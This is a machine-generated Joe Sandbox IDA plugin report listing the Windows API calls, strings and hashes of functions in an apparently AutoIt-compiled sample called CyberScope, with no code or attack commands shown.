                                                                                    • Opcode ID: 80fc0fa29bcb4262427edd413720529704d1a4d083837ebc78ab3558c8188ba2
                                                                                    • Instruction ID: bb0a8c708ae8025ab14139a9ff641d66efb0cf1e32879e171bdd228c4b4836d6
                                                                                    • Opcode Fuzzy Hash: 80fc0fa29bcb4262427edd413720529704d1a4d083837ebc78ab3558c8188ba2
                                                                                    • Instruction Fuzzy Hash: DDF0F475A4021867CB04F3A49C95FFE73A8AF22354F400A15F922A32C1DB70590CC6A0
                                                                                    APIs
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                    • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00229B6D
                                                                                      • Part of subcall function 00192234: GetWindowLongW.USER32(?,000000EB), ref: 00192242
                                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00229B53
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow$MessageProcSend
                                                                                    • String ID: (&
                                                                                    • API String ID: 982171247-1801568203
                                                                                    • Opcode ID: 8aa8e3605dcda5018142ad2c1ab74acc1d4a807eea6b67c38e4ab896b81beea1
                                                                                    • Instruction ID: 3a5a286938b6a84d524ed85f44fc63fd7c9433c6c693fcb5a64801f8751133fc
                                                                                    • Opcode Fuzzy Hash: 8aa8e3605dcda5018142ad2c1ab74acc1d4a807eea6b67c38e4ab896b81beea1
                                                                                    • Instruction Fuzzy Hash: 6601DF31211624FBDB259F94FC48FA63B66FB85368F100528F9021B1E0C7B268A6DB60
                                                                                    APIs
                                                                                      • Part of subcall function 0019249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001924B0
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00228471
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0022847F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongWindow
                                                                                    • String ID: (&
                                                                                    • API String ID: 1378638983-1801568203
                                                                                    • Opcode ID: d9a3b858d8c960d68f0158d3d9bd1616dee784be43d9129bc61eafb77dabe14c
                                                                                    • Instruction ID: c580c646452710395fc90e2672c51ac8e3bb29051d16fcf975b5490891e10869
                                                                                    • Opcode Fuzzy Hash: d9a3b858d8c960d68f0158d3d9bd1616dee784be43d9129bc61eafb77dabe14c
                                                                                    • Instruction Fuzzy Hash: 49F06835112655EFC714EFA4FC44D6977A5FB95320B20861DF926873F0CB709815DB50
                                                                                    APIs
                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 001F146F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message
                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                    • API String ID: 2030045667-4017498283
                                                                                    • Opcode ID: a0a671086699d38d9aa163d657851636c2de62f24de441a5f20cd4f59fb45a96
                                                                                    • Instruction ID: 268b892838b4f4302ae33881c9b9ffedf376604aaf0a09c72947fb8ed2ee5251
                                                                                    • Opcode Fuzzy Hash: a0a671086699d38d9aa163d657851636c2de62f24de441a5f20cd4f59fb45a96
                                                                                    • Instruction Fuzzy Hash: 34E048322587283AD72527D8BC07FD576858F19B51F11441AF748694C28FF265A0429D
                                                                                    APIs
                                                                                      • Part of subcall function 001AFAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,001B10E2,?,?,?,0019100A), ref: 001AFAD9
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0019100A), ref: 001B10E6
                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0019100A), ref: 001B10F5
                                                                                    Strings
                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 001B10F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                    • API String ID: 55579361-631824599
                                                                                    • Opcode ID: 07f53bf8bd59e89be30bc557d12215f9a4a0180c89f5cd698ebf75d1af13b742
                                                                                    • Instruction ID: 28bddfdb194c9ab02ce3fe3ee70377bd7f30971ee162dff2b489d1d44fa758ac
                                                                                    • Opcode Fuzzy Hash: 07f53bf8bd59e89be30bc557d12215f9a4a0180c89f5cd698ebf75d1af13b742
                                                                                    • Instruction Fuzzy Hash: F9E06D707007109BD330AF78E958782BBE4EB18301F05895CE885C2252DBB4E448CBA1
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 001AF151
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID: `5&$h5&
                                                                                    • API String ID: 1385522511-356792987
                                                                                    • Opcode ID: 5448d4f5ab0bd7274f8b2972a67b5fe9d370aaed89671b2c41d9aa2e9adad9e3
                                                                                    • Instruction ID: 4234ad5b1fc712b8f4558ce88d499261a0b15614b6f613e859df872760df3d77
                                                                                    • Opcode Fuzzy Hash: 5448d4f5ab0bd7274f8b2972a67b5fe9d370aaed89671b2c41d9aa2e9adad9e3
                                                                                    • Instruction Fuzzy Hash: EDE02639404814CBC611D76CF8099C833A0EB0F320BB0427EE103872B19B302A83CA15
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 002039F0
                                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00203A05
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Temp$FileNamePath
                                                                                    • String ID: aut
                                                                                    • API String ID: 3285503233-3010740371
                                                                                    • Opcode ID: 0b1617a5f2031c4b7f62cc1743c5fce17c96d83579c9453a6da5e947be24411a
                                                                                    • Instruction ID: f87a8b67a2e0213972f2322005346ce3e1ab504200562d2a6715fdf1e8b50e23
                                                                                    • Opcode Fuzzy Hash: 0b1617a5f2031c4b7f62cc1743c5fce17c96d83579c9453a6da5e947be24411a
                                                                                    • Instruction Fuzzy Hash: F0D05B71540314B7DA3097A4AC0DFCB7A6CDB45711F0002917E5591091DAB0E545C790
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00222DC8
                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00222DDB
                                                                                      • Part of subcall function 001FF292: Sleep.KERNEL32 ref: 001FF30A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 945f29ae362fb213ee800a2b8430904b84923915090b98c6801cfc1a539cb8b7
                                                                                    • Instruction ID: d0384d1d932ca54a3115bfe3ffc2ff4d225d3e91484f611a37dadae8686acc3d
                                                                                    • Opcode Fuzzy Hash: 945f29ae362fb213ee800a2b8430904b84923915090b98c6801cfc1a539cb8b7
                                                                                    • Instruction Fuzzy Hash: 15D0A9353E4300B6E238A3B0BC0FFE66A149F10B00F100824730AAA0C0CAE0A8028644
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00222E08
                                                                                    • PostMessageW.USER32(00000000), ref: 00222E0F
                                                                                      • Part of subcall function 001FF292: Sleep.KERNEL32 ref: 001FF30A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: ae558df0c5e61926567bb83e6fca318fa4995d20f05bd77e3c09a2faadbf1a94
                                                                                    • Instruction ID: 1760fd24e5832d76647102f6c53506e4cc621f61bf5414445a001c30bc191079
                                                                                    • Opcode Fuzzy Hash: ae558df0c5e61926567bb83e6fca318fa4995d20f05bd77e3c09a2faadbf1a94
                                                                                    • Instruction Fuzzy Hash: 11D0A9313D13007AF238A3B0BC0FFE66A149B14B00F5008247306AA0C0CAE0A8028648
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 001CC213
                                                                                    • GetLastError.KERNEL32 ref: 001CC221
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 001CC27C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1717984340-0
                                                                                    • Opcode ID: 9d2cbfe7f7592e915e29cb2050407ab47f024e4aca990258f3ec15d3abb1231f
                                                                                    • Instruction ID: a0b6adf2db6faa1717b7f6b6f42d26dc1b71046d39fa2eabbdd5b9c0ce4d836d
                                                                                    • Opcode Fuzzy Hash: 9d2cbfe7f7592e915e29cb2050407ab47f024e4aca990258f3ec15d3abb1231f
                                                                                    • Instruction Fuzzy Hash: 4441B131600206EFDB259FE5C844FAA7BA5AF71720F2541ADF85DAB1A1DB30CD01CBA1